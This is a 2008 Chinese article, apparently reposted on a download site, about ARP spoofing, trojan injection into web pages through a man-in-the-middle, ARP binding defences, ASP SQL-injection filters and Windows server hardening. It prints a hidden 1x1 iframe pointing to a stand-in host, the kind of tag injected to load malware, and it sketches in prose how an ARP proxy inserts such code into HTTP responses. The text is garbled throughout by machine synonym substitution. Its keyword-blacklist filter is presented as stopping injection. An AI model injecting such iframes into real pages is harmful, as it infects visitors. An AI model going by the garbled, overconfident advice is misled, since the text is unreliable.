网站被挂马 ARP地址欺骗解决之道pc软件 文章资讯 手机软件

您当前的位置→图文中心ARP文章ARP防范网站被挂马 ARP地址欺骗解决之道

网站被挂马 ARP地址欺骗解决之道


2008/8/13 17:35:25 编辑:佚名 来源:admin 

什么是ARP

地址解析协议(Address Resolution Protocol, ARP)是就在只知道主机的IP地址时确定其物理地址的一种协议。 因IPv4和以太网的广泛应用, 其主要用作将IP地址翻译为以太网的MAC地址, 但其也能就在ATM和FDDIIP网络net中使用。 从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。 ARP具体说来就是将网络net层(IP层, 也就是相当于OSI的第三层)地址解析为数据信息连载层(MAC层, 也就是相当于OSI的第二层)的MAC地址。

假设:

电脑计算机A的IP为192.168.1.1, MAC地址为00-11-22-33-44-01;

电脑计算机B的IP为192.168.1.2, MAC地址为00-11-22-33-44-02;

ARP工作原理如下:

就在TCP/IP协议中, A给B发送sendIP包, 就在包头中有请求需要填写B的IP为目标地址, 但这个IP包就在以太网上传输的时候, 还是有请求需要来进行一次以太包的封装, 就在这个以太包中, 目标地址就是B的MAC地址。

电脑计算机A是怎么才能得知B的MAC地址的呢?解决处理问题的关键就就在于ARP协议。

就在A不知道B的MAC地址的情况下, A就广播一个ARP请求包, 请求包中填有B的IP(192.168.1.2), 以太网中的所有电脑计算机都会接收这个请求, 而正常的情况下只有B会给出ARP应答包, 包中就填充上了B的MAC地址, 并回复给A。

A得到ARP应答后, 将B的MAC地址放入本机缓存, 便于下次使用。

本机MAC缓存是有生存期的, 生存期结束后, 将再次重复上面的过程。

ARP协议并不只就在发送send了ARP请求才接收ARP应答。 当电脑计算机接收到ARP应答数据信息包的时候, 就一定会对本地的ARP缓存来进行更新, 将应答中的IP和MAC地址存储就在ARP缓存中。 因此, 当局域网中的某台机器B向A发送send一个我自己伪造的ARP应答, 而如果这个应答是B冒充C伪造来的, 即IP地址为C的IP, 而MAC地址是伪造的, 则当A接收到B伪造的ARP应答后, 就一定会更新本地的ARP缓存, 这样就在A看来C的IP地址没有变, 而它的MAC地址已经不是本来那个了。 由于局域网的网络net流通不是根据记录IP地址来进行, 而是按照MAC地址来进行传输。 所以, 那个伪造出来的MAC地址就在A上被改变成一个不存就在的MAC地址, 这样就一定会造成网络net不通, 导致A不能够Ping通C!这就是一个不复杂的ARP欺骗。

应用

就在网络net执法官中, 要想限制某台机器上网, 只要用鼠标点击"网卡"菜单中的"权限", 选择中指定的网卡号或就在用户列表中用鼠标点击该网卡所就在行, 从右键菜单中选择中"权限", 就在弹出的对话框中即可限制该用户的权限。 对于未登记网卡, 可以能够这样限定其上线:只要设定好所有已知用户(登记)后, 将网卡的默认权限改为禁止上线即可阻止所有未知的网卡上线。 使用这两个功能就可限制用户上网。 其原理是可以通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应的MAC, 使其找不到网关真正的MAC地址, 这样就可以能够禁止其上网。

防御

ARP欺骗可以能够导致目标电脑计算机与网关通信失败

更可怕的是会导致通信重定向, 所有的数据信息都会可以通过攻击者的机器, 因此存就在极大的安全隐患。

基与PC到PC的IP-MAC双向绑定可以能够解决处理ARP欺骗

但是对于不支持IP-MAC双向绑定的设备

就有请求需要用可以能够绑定端口-MAC的交换来预防ARP欺骗

另外, Windows 2KSP4 XPSP1 的Arp-S绑定是无效的

有请求需要升级到 2KSP5 或 XPSP2

网页挂马原理

不管是访问服务器上的任意一个网页, 就连404的页面也会就在<html>后加入:

<IFRAME SRC=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></IFRAME>;, 挂马的详细位置就在html标记左右, 上面这段恶意代码, 它会每隔几秒加入代码, 也就是说就在输出具体的东西之前就被挂了, 有时有有时又没有, 不是网页源代码问题, 也没有就在网页源代码中加入恶意代码, 即便重装服务器, 格式化重分区过第一个硬盘, 放上去网站没多久一样再会出现这种情况。

最先是就排除了网站被入侵的有可能, 因为首页能加就在那个详细位置只能是 title的地方, 用js控制也不大有可能.之后去看了php.ini的布置设置也没有任意一个的异常, 而且这个插入的代码有的时候出现有的时候不出现, 说明不是网站的问题了。 打开同服务器的其他网站也有这个情况发生, 而且状况一一样。 检查并且搜索挂马的关键字之后确定不是网站程序的问题。

那么剩下的要么是IIS我自己出了问题, 要么是网络net的问题, 因为数据信息是处理没有问题(这个由程序输出, 而且即便是html都会出问题), 经过一个一个排查, 最后可以说是可以能够确定就是arp欺骗欺骗数据信息报走向, 之后中间人修改一些定义的关键字.因为是网络net层次有问题(所以重做系统system是没有用的)。

目的:可以通过arp欺骗来直接挂马

优点:可以能够直接可以通过arp欺骗来挂马。

通常的arp欺骗的攻击方式是就在同一个vlan下, 控制一台主机来监听密码, 或者结合ssh中间人攻击来监听ssh1的密码

但这样存就在局限性:1、管理员经常不登陆, 那么要很久才能监听到密码。

2、目标主机只开放了80端口, 和一个管理端口, 且80上只有静态页面, 那么很难利用.而管理端口, 如果是3389终端, 或者是ssh2, 那么非常难监听到密码。

优点:1、可以能够不用获得目标主机的权限就可以能够直接就在上面挂马

2、非常隐蔽, 不改动任意一个目标主机的页面或者是配置, 就在网络net传输的过程中间直接插入挂马的语句。

3、可以能够最大化的利用arp欺骗, 从而只要获取一台同一个vlan下主机的控制权, 就可以能够最大化战果。

原理:arp中间人攻击, 实际上相当于做了一次代理。

正常时候: A---->B , A是访问的正常客户, B是要攻击的服务器, C是被我们我自己控制的主机

arp中间人攻击时候: A---->C---->B         B---->C---->A

实际上, C就在这里做了一次代理的作用

那么HTTP请求发过来的时候, C判断下是哪个客户端发过来的包, 转发给B, 之后B返回HTTP响应的时候, 就在HTTP响应包中, 插入一段挂马的代码, 比如 <iframe>...之类, 再将修改过的包返回的正常的客户A, 就起到了一个挂马的作用.就在这个过程中, B是没有任意一个感觉的, 直接攻击的是正常的客户A, 如果A是管理员或者是目标单位, 就直接挂上马了。

防御专题

最不复杂的办法就一命令OK, 实现与网关绑定, 比如网关是 192.168.0.1 比如网关MAC 00-00-00-00-00, 好了我们我自己直接用记事本保存代码为 arp -s 192.168.0.1 00-00-00-00-00 之后保存, 改拓展名为bat 加入到服务器启动项, 就在目前ARP攻击猖獗, ARP的就在目前为一的完美解决处理方案就是实现 本机与网关的双向绑定。 所谓ARP防火墙, 只是起到暂时保护的作用, 上面方法可以能够有效的防止服务器被人ARP挂马

SQL漏洞专题

不复杂一点:

对于int型的参数, 如文章的id等, 可以能够先判断是不是整数。

以下为引用的内容:
id =trim(request("id"))
if id<>"" then
if Not isNumeric(id) then
response.write"请提供数字型参数"
response.end
end if
id = clng(id)
else
response.write"请输入参数id"
response.end
end if

这样的话, 明小子系列就再也不能够注入了。

也可以能够控制 "'"号输入就行了, 再控制一些 SQL 关键字的这样更安全

比如

以下为引用的内容:

id=trim(request("id"))

if instr(id, "'")>0 or instr(id, "insert")>0 then
response.write "对不起, 请一定不要注入本站"
response.end
end if

提醒大家, SQL只要打完必补丁, 最重要的是, 千万别布置设置什么SA/123456 SA/123 SA/SA之类的弱口令, 现就在的小黑太多了, 动不动就是全网段扫描1433弱口令, 就在次提醒大家, 千万别布置设置弱口令。 可以说是服务器就安全(小黑是进不来的, 高手嘛, 说不准了, 反正高手也将不会动您的东西)

服务器安全之后门篇

我们我自己就在今天主要讲解2003服务器

最常见的问题, 服务器一般都开3389 4899等, 就在次提醒大家, 弱口令问题, 现就在什么小黑都有, 千万别布置设置什么123 123456之类, 修改3389 4899端口 主张停止stop微软的防火墙, 直接就在网上, 开放有请求需要的端口。 系统system补丁, 我想不用说, 肯定要打的。 也可采用国外的一款软件 黑冰(号称世界排第三, 本人以前用过, 感觉也就那样, 不过确实很好)

本地安全策略布置设置密码强度, 之后删出系统system默认管理员, 修改管理组, 别留什么adminisrators 呵呵, 不允许建立帐户, 嘿嘿, 绝吧。

服务器杀毒软件必备!推荐使用麦咖啡。 上次进了一批服务器, 发现全是用麦咖啡(连联众的计费服务器, baidu的有一个服务器也是), 布置设置OK可以说是百毒不侵(服务器好的主张使用, 呵呵就可以能够防止什么鸽子啊, 黑洞啊, 红娘啊之类的东西装上了)。

就在次说明请大家检查我自己的服务器登陆3389界面, 别输入密码, 先按5次SHIFT, 看看, 如果弹出c盘, 或cmd 或则一个密码窗口, 呵呵恭喜您, 您的服务器被人玩了, 小弟可帮大家解决处理, 这个后门被誉为windows最强悍后门。 不有请求需要密码验证, 直接得到shell。

相关文章
  • 如何查看网站的安全性?360照妖镜帮到你
  • PHP利用Socket获取网站的SSL证书与公钥
  • 网站链接分析工具
  • SEO必知的100个网站优化问答
  • 网站服务器需要考虑哪些方面?网站空间租用挑选技巧
  • 苹果建了一个网站:怂恿安卓用户投奔iPhone
  • 网站优化需要有哪些技巧
  • 网站用户的浏览体验为什么很重要
  • 发表评论
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图